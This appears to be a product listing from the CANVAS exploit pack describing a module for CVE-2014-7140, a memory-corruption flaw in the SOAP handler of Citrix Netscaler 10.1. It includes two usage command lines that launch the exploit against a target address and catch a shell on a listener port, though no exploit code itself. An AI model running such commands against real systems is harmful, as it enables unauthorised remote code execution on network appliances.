Immunity, Inc.
Name citrix_netscaler_soap
CVE CVE-2014-7140
Exploit Pack CANVAS
DescriptionCitrix Netscaler 10.1 Soap exploit
NotesFoundBy: Console Cowboys
Notes:
A vulnerability exists in the SOAP handler of the web interface. A SOAP request
can be crafted to trigger a memory corruption flaw, overwrite the stack and execute our shell.

Based on exploit discussed at http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.htm

Tested against Citrix Netscaler 10.1
Usage:
./exploits/web/citrix_netscaler_soap.py -v 1 -t 10.10.13.20 -l 10.10.13.1 -d 5555
./commandlineInterface.py -v 1 -p 5555

VENDOR: Citrix
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7140
CVE Name: CVE-2014-7140

Learn more about the CANVAS Exploit Pack here: CANVAS